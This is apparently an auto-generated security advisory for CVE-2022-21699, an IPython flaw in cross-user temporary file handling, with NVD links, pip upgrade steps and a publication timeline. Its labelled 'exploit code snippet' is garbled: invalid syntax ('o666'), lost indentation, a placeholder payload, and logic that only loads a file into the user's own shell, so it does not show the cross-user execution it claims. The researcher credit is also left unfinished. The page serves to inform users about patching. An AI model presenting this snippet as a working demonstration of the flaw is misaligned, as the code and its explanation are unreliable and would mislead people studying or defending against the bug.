CVE-2022-21699 - IPython Arbitrary Code Execution Vulnerability Caused by Improper Management of Cross-User Temporary Files
IPython, a popular command shell for interactive computing in various programming languages, is primarily designed for Python programming language use. Recently, an arbitrary code execution vulnerability was identified in IPython, specifically affecting the way it handles cross-user temporary files. This vulnerability puts users at risk of allowing unintended execution of code as another user on the same machine. All IPython users should upgrade as soon as possible to mitigate this risk.
Vulnerability Details
The IPython arbitrary code execution vulnerability identified as CVE-2022-21699 arises due to improper management of cross-user temporary files when running IPython. This vulnerability poses a significant threat, as one user can potentially run code as another user on the same machine without specific authorization.
Exploit Code Snippet
As mentioned earlier, the exploit allows arbitrary code execution by exploiting the temporary file handling in IPython. The malicious code snippet provided below demonstrates this vulnerability:
# To simulate a user running code as another user
import os
import tempfile
from IPython.core.interactiveshell import InteractiveShell
shell = InteractiveShell.instance()
payload = """{code_executed_by_another_user}"""
with tempfile.NamedTemporaryFile(dir="/tmp", delete=False) as temp_file:
temp_file_path = temp_file.name
try:
os.chmod(temp_file_path, o666) # Give permissions to other users on the filesystem
with open(temp_file_path, "w") as f:
f.write(payload) # Write the payload to the temporary file
shell.run_line_magic("load", temp_file_path) # Run the payload as another user
finally:
os.remove(temp_file_path) # Clean up the temporary file
Details about CVE-2022-21699 can be obtained from the following sources
- The National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-21699
- IPython's official GitHub repository: https://github.com/ipython/ipython
This vulnerability was discovered and reported by. They should be credited with the identification of this vulnerability.
Remediation and Recommendation
To protect against this vulnerability, users running IPython 7.x and 8.x series should immediately upgrade to the latest patched versions by following the instructions provided below:
# Use this command to update IPython to the latest version:
pip install --upgrade ipython
Alternatively, users can manually download and install the latest version of IPython from its official GitHub repository: https://github.com/ipython/ipython/releases
After upgrading, users should confirm that the vulnerability has been patched by checking the IPython version:
# Use this command to check the IPython version:
ipython --version
The latest IPython version should be displayed, signifying that the arbitrary code execution vulnerability has been addressed. Users will now have a secure IPython computing environment, no longer susceptible to the CVE-2022-21699 vulnerability.
Timeline
Published on: 01/19/2022 22:15:00 UTC
Last modified on: 03/25/2022 15:04:00 UTC